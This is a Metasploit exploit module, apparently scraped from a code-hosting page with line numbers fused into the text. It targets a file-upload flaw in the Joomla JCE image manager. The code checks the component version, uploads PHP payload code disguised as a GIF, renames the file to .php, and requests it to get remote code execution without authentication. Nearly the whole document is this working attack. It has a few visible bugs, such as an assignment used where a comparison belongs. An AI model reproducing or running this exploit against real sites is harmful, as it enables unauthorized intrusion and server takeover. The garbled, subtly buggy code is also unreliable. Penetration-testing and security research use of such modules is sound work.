Path: blob/master/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb
19669 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::FileDropper1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Joomla Component JCE File Upload Remote Code Execution',16'Description' => %q{17This module exploits a vulnerability in the JCE component for Joomla!, which18could allow an unauthenticated remote attacker to upload arbitrary files, caused by the19fails to sufficiently sanitize user-supplied input. Sending specially-crafted HTTP20request, a remote attacker could exploit this vulnerability to upload a malicious PHP21script, which could allow the attacker to execute arbitrary PHP code on the vulnerable22system. This module has been tested successfully on the JCE Editor 1.5.71 and Joomla231.5.26.24},25'Author' => [26'Unknown', # From AmnPardaz Security Group # Vulnerability discovery and PoC27'Heyder Andrade <eu[at]heyderandrade.org>' # Metasploit module28],29'License' => MSF_LICENSE,30'References' => [31['OSVDB', '74839'],32['EDB', '17734'],33['BID', '49338']34],35'Payload' => {36'Space' => 4000, # only to prevent error HTTP 414 (Request-URI Too Long)37'DisableNops' => true,38'BadChars' => "#",39'Keys' => ['php']40},41'Platform' => 'php',42'Arch' => ARCH_PHP,43'Targets' => [[ 'Automatic', {}]],44'Privileged' => false,45'DisclosureDate' => '2012-08-02',46'DefaultTarget' => 0,47'Notes' => {48'Reliability' => UNKNOWN_RELIABILITY,49'Stability' => UNKNOWN_STABILITY,50'SideEffects' => UNKNOWN_SIDE_EFFECTS51}52)53)5455register_options(56[57OptString.new('TARGETURI', [true, "Joomla directory path", "/"])58]59)60end6162def get_version63# check imgmanager version64@uri_base = normalize_uri(target_uri.path.to_s, 'index.php')65@vars_get_base = {66'option' => 'com_jce',67'task' => 'plugin',68'plugin' => 'imgmanager',69'file' => 'imgmanager'70}71print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")72res = send_request_cgi({73'uri' => @uri_base,74'vars_get' => @vars_get_base,75'method' => 'GET',76'version' => '1.1'77})7879version = nil80if (res and res.code == 200)81res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<})82version = $1.nil? ? nil : $183end8485return version86end8788def check89version = (get_version || '').to_s9091if (version.match(%r{1\.5\.7\.1[0-4]?}))92return Exploit::CheckCode::Appears93end9495return Exploit::CheckCode::Safe96end9798def upload_gif99# add GIF header100cmd_php = "GIF89aG\n<?php #{payload.encoded} ?>"101102# Generate some random strings103@payload_name = rand_text_alpha_lower(6)104boundary = '-' * 27 + rand_text_numeric(11)105106parms = { 'method' => 'form' }107parms.merge!(@vars_get_base)108109# POST data110post_data = Rex::MIME::Message.new111post_data.bound = boundary112post_data.add_part("/", nil, nil, "form-data; name=\"upload-dir\"")113post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"\"")114post_data.add_part("0", nil, nil, "form-data; name=\"upload-overwrite\"")115post_data.add_part("#{cmd_php}", "image/gif", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}.gif\"")116post_data.add_part("#{@payload_name}", nil, nil, "form-data; name=\"upload-name\"")117post_data.add_part("upload", nil, nil, "form-data; name=\"action\"")118119data = post_data.to_s120121res = send_request_cgi({122'uri' => @uri_base,123'vars_get' => parms,124'method' => 'POST',125'version' => '1.1',126'data' => data,127'ctype' => "multipart/form-data; boundary=#{post_data.bound}"128})129130if (res and res.code = 200)131return :access_denied if (res.body =~ /RESTRICTED/i)132133print_good("Successfully uploaded #{@payload_name}.gif")134else135print_error("Error uploading #{@payload_name}.gif")136return :abort137end138139return :success140end141142def renamed?143# Rename the file from .gif to .php144145data = "json={\"fn\":\"folderRename\",\"args\":[\"/#{@payload_name}.gif\",\"#{@payload_name}.php\"]}"146147print_status("Change Extension from #{@payload_name}.gif to #{@payload_name}.php")148149res = send_request_cgi(150{151'uri' => @uri_base,152'vars_get' => @vars_get_base,153'method' => 'POST',154'version' => '1.1',155'data' => data,156'ctype' => 'application/x-www-form-urlencoded; charset=utf-8',157'headers' =>158{159'X-Request' => 'JSON'160}161}162)163if (res and res.code == 200)164print_good("Renamed #{@payload_name}.gif to #{@payload_name}.php")165return true166else167print_error("Failed to rename #{@payload_name}.gif to #{@payload_name}.php")168return false169end170end171172def call_payload173payload = "#{@payload_name}.php"174print_status("Calling payload: #{payload}")175uri = normalize_uri(target_uri.path.to_s, "images", "stories", payload)176res = send_request_cgi({177'uri' => uri,178'method' => 'GET',179'version' => '1.1'180})181end182183def exploit184return if not check == Exploit::CheckCode::Vulnerable185186if upload_gif == :success187if renamed?188register_files_for_cleanup("#{@payload_name}.php")189call_payload190end191end192end193end194195196